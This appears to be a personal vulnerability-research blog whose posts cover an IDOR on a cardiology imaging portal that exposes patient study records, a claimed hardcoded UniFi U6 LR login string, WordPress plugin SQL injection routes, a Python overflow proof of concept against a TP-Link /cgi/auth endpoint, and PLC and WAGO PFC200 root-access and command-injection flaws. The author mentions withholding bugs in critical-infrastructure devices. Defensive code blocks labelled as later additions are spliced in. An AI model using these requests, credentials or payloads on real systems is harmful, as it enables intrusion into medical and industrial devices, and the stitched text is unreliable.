Mi0r4sora

fun life is better than every money vulnerability research just for fun

I guess I screwed up a lot of vulnerabilities, so for now I don't have 1 dollar. The newest bug I exploited is this one: the IDOR in one of the biggest programs. I didn't write the word "leak" in my report, so it got marked informative and patched, hmmm..

Step 1 – go to the search bar and search for dummy data.
Step 2 – change the filterType to 1 to disable it.

original request: 

GET /sdportal/StudyList/StudyListResult?source=Cardiology&server=server2&filterName=QuickSearch&filterType=0&search=alldays-admin&_search=false&nd=1719508416301&rows=50&page=1&sidx=StudyDate&sord=desc HTTP/1.1
Host: server1.domain.tld
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=1
Te: trailers
Connection: keep-alive

After that, the response contains a lot of data about users and employees, like UID, gender, username, etc. The interesting part of this story is the users' data: we read the data from server2 while only having access to server1. We send the request from server1 and can read a lot of data that we don't have access to. On server one, if we search for anything the response is [], but here, after disabling the filter, we get a lot of data:

      "StudyStatus": "UNREAD",
      "Reports": "",
      "PDFReports": "",
      "DiagnosingPhysician": [],
      "ReferringPhysician": null,
      "Diagnosis": "",
      "StudyLocation": "Online",
      "PriorStudies": 1,
      "Modality": "SRXA",
      "OriginalModality": "SRXA",
      "NumberOfImages": 12,
      "Indication": "",
      "Technologist": [],
      "Custom1": "",
      "Custom2": "",
      "ServerName": "server2",
      "Department": "Cardiology",
      "ReportUploadStatus": "",
      "MasterPatientId": null,
      "StudyPerformed": "",
      "UID": "uid user",
      "IsViewableInPir": true,
      "IsStudyLocked": false,
      "IsTrinityEnabled": false,
      "IsPDFReportAvailable": false,
      "Sex": "",
      "IsADTReconciled": false,
      "IsORMAssociated": false,
      "NumberOfConflicts": 0
    },

After sending it, we got "informative".
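One way the server side could close this gap, as an added example (not code from the original post or from the affected product): check the `server` parameter against the caller's entitlements and refuse a client-supplied `filterType` that switches filtering off. The entitlement table, account names and function name are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed entitlement table (assumption): which back-end servers each
# account may query, and whether it may request an unfiltered listing.
ENTITLEMENTS = {
    "clinician1": {"servers": {"server1"}, "unfiltered": False},
    "pacs-admin": {"servers": {"server1", "server2"}, "unfiltered": True},
}


class Forbidden(Exception):
    """Raised when a request asks for data outside the caller's entitlements."""


def authorize_study_list(user: str, request_target: str) -> dict:
    """Vet a StudyListResult request before any query is built from it."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)

    def single(name: str) -> str:
        values = params.get(name, [])
        # Reject missing or repeated parameters so a later component cannot
        # act on a different value than the one that was checked here.
        if len(values) != 1:
            raise Forbidden(f"{name} must appear exactly once")
        return values[0]

    ent = ENTITLEMENTS.get(user)
    if ent is None:
        raise Forbidden("unknown user")
    server = single("server")
    filter_type = single("filterType")
    # The session decides which servers are readable, not the query string.
    if server not in ent["servers"]:
        raise Forbidden(f"{user} may not read from {server}")
    # Only privileged accounts may turn the search filter off.
    if filter_type != "0" and not ent["unfiltered"]:
        raise Forbidden("unfiltered listing not permitted")
    return {"server": server, "filterType": filter_type, "search": single("search")}


# Request targets shaped like the one in the post (constructed, shortened).
NORMAL = "/sdportal/StudyList/StudyListResult?source=Cardiology&server=server1&filterType=0&search=dummy"
TAMPERED = "/sdportal/StudyList/StudyListResult?source=Cardiology&server=server2&filterType=1&search=dummy"
```
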

Firmware: device version BZ.MT7622_6.6.55+15189.231127.1104, type UniFi U6 LR

In the binary blebrd we can see a lot of parameter handlers, and after some searching we can see the parameters def-password and def-username. After some more searching we can see that the parameters controlling the default credentials use a hardcoded password and username to get access to the device.

In this part, for def-username, we can see param2 defined, and after that def-username uses the param2 offset to get the data. It is the same for def-password.

blebrd is the web server of the UniFi device.

So we can log in to all devices from the WAN and get access to them :) with JSON, or like this, for example: def-password=D_DpOT0_EUlDpOT_E_&def-username=D_DpOT0_EUlDpOT_E_

        00458140    cbz        param_1 ,LAB_00458178
        00458144    adrp       param_2 ,s_D_DpOT0_EUlDpOT_E__00565f58+168       = "D_DpOT0_EUlDpOT_E_"
        00458148     add        param_2 =>s_def-username_00566902 ,param_2 ,#0x902 = "def-username"
        0045814c     mov        param_1 ,x21

so much fun

The wpForo plugin 2.3.4 is vulnerable to SQL injection. I need SQL injection in some plugins, so I am working on these plugins; both of the last posts I made are SQL injections, and they solve my project. So after a little while I started looking at CVE-2024-3200. But I have to say that I only saw the authentication part of this vulnerability after I had started working on it, so after finishing work on this CVE I started working on the latest HTML5 Video Player SQL injection CVE.

But let's analyse this vulnerability.

After so much checking and reading how it works, I see this, so much fun:

In the file boards.php –> line: 289. After seeing it, I searched for what boards.php does; I searched the plugin's guide and saw this :(

So after that I see that this is authenticated.

To create a new board, you should navigate in Dashboard to wpForo > Boards admin page and click the [Add new] button: Fill and select your preferred values for following fields: Board Title: The new discussion board title which will be displayed on the forum header section. 

So the parameters through which we can execute the SQL query are the slug params in the description: sluginclude and slugexclude.

so much fun

After this, the args parameter is appended to the $sql variable and executed.

After analyzing the plugin and understanding how it works and how it differs, I see some interesting things in this file:

wp-content/plugins/html5-video-player/inc/Rest/VideoController.php, the diff of this patch:

So in this function we can see that the attacker can escape in the SQL string and does not need to do anything like add escape chars or bypass anything.

And here we can see the vulnerable route: /wp-json/h5vp/v1/video/

sql injection

So we know everything we need to know :) Also, the request method is POST and the vulnerable parameter is "id".

The request is this:

$request = array( 'method' => 'POST', 'body' => $params, 'timeout' => 60, );
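Why escape characters are not needed when a value such as `id` (or the wpForo args above) is appended to the SQL string in a numeric position, next to the hardened form, as an added example that is not code from either plugin. It uses Python's sqlite3 as a stand-in for the WordPress database layer; the `videos` table, its rows and the function names are constructed for illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the plugin's video table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    db.executemany(
        "INSERT INTO videos VALUES (?, ?, ?)",
        [(1, "intro", "alice"), (2, "draft", "bob"), (3, "private", "carol")],
    )
    return db


def get_video_vulnerable(db: sqlite3.Connection, params: dict) -> list:
    # The id lands in a numeric position: there are no quotes to break out
    # of, so quote-escaping the input would not have helped either.
    sql = "SELECT id, title FROM videos WHERE id = " + str(params["id"])
    return db.execute(sql).fetchall()


def get_video_hardened(db: sqlite3.Connection, params: dict) -> list:
    raw = str(params.get("id", ""))
    # Accept only a plain decimal integer of sane length, then bind it as a
    # parameter so it can never be parsed as SQL.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 18):
        raise ValueError("id must be a positive integer")
    return db.execute(
        "SELECT id, title FROM videos WHERE id = ?", (int(raw),)
    ).fetchall()


# POST bodies as the handler would receive them (constructed).
BENIGN = {"id": "2"}
TAMPERED = {"id": "2 OR 1=1"}  # textbook tautology, no quote characters at all
```
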

Also, I see some XSS patches in version 2.5.26 of this plugin.

If someone asks me what do you think about air gap networks, I will answer that this is a very good way to increase network security. But if they say that it cannot be hacked at all, I will show them this sample and articles along with the source code.

An example struct to get an AM 1580 kHz frequency from the CPU bus to the destination with that structure, and use the time pulse of the CPU to send it over the air-gapped network.

Hmm, we can do this with some function like hostgetclock_service.

One day when I was really bored, I told my friends to send me the models and types of routers and IoT devices they have so that I can send them an example of vulnerabilities. In the meantime, they said the name of this device is TP-Link.

In the first part, I went to /etc to check the entries so that I can get through it the type of input data of the interfaces and things like this. The best parts that are really interesting for us to develop the exploit are ppp and pppoe and also l2tp and so on. HTTP is for this part. In this part I went to httpd, which is a custom web server, to start with.

In the above image, I saw io, which is the input and output controller, which is referenced to several functions that you see

The function searches for different paths and returns 404 if there is none

the interesting route

The input is parsed from the http header side on the

vulnerable function: httprpmauth_main

vulnerability:

        if (param1[0xd] == 1) {
          pcVar3 = "adminName=%s\nadminPwd=%s\n";
        }
        else {
          pcVar3 = "userName=%s\nuserPwd=%s\n";
        }
        sprintf(acStack1fbc,pcVar3);
        iVar1 = rdpsetObj(0,"USERCFG",&local1fec,acStack1fbc,2);

This one really shows me that it gets the header request parameters and copies them to the stack with sprintf. After that I need to know which route gets input to it, so I guess maybe this function's xref leads to its route.

        httpaliasaddEntryByArg(2,"/cgi/auth",(char *)0x0,(int)httprpmauthmain,ghttpauthordefault);

param1 is an int; I don't have any idea what it does, so I need to analyse this function.
param2 is the route.
param3 is 0x0.
param4 calls the function that gets the parameters of the header requests.
param_5: maybe this is a default parameter set by the device.

So in this route we can use these parameters of the HTTP header to get an overflow?

Maybe this:

        import requests

        headers = {
            "Host": "192.168.0.1",
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Accept": "/",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "text/plain",
            "Content-Length": "78",
            "Origin": "http://192.168.0.1",
            "Connection": "close",
            "Referer": "http://192.168.0.1/",
        }

        payload = "a" * 2048
        formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,userName={}nuserPwd=1231313".format(payload)
        url = "http://192.168.0.1/cgi?8"
        response = requests.post(url, data=formdata, headers=headers)
        print(response.text)

If it doesn't work, change one of the parameters to the true one and test it to get a crash, so we can exploit it like that.

I guess some day I wanted to research some PLC devices, and I saw this device on Shodan, hmmm... I didn't know anything about it, so I downloaded the software and firmware from the site and started researching, hmm.

And I see this:

The TFTP port on it is open by default, why? Hmm, so I checked this on some critical devices and I saw this, bruh, we can access root on these.

And we can access the device. After I saw that, I thought to myself, do I have a zero day? But today I see this vulnerability has been patched as this CVE: CVE-2019-9201

This vulnerability is like a shell access port open without any credentials :/

Today I explain how we can exploit the command injection vulnerability in the WAGO PFC200 firmware.

Command injection is a vulnerability that allows an attacker to issue its own commands to the device and access it.

The vulnerability is in this directory: pfc200/var/www/wbm/php

and the filename is: session_lifetime.inc.php

On each request that is sent, this function is responsible for checking the username parameter in the session ID (PHPSESS).

We can't inject the command in the session; we just need to check where this function is used on the web server and inject our own command, for fun :)

In order to give them a little more time, I will not publish this yet (I am talking about the PoC and other stuff like that).

So this is a really shitty command injection in this function :/

Why do you use this?

I have reported it but there is still no response after 1 week. Also, I have 2 other vulnerabilities in the iocheckd service, but I don't like to report them.

This is a WAN-side vulnerability and this device is used in really critical infrastructure.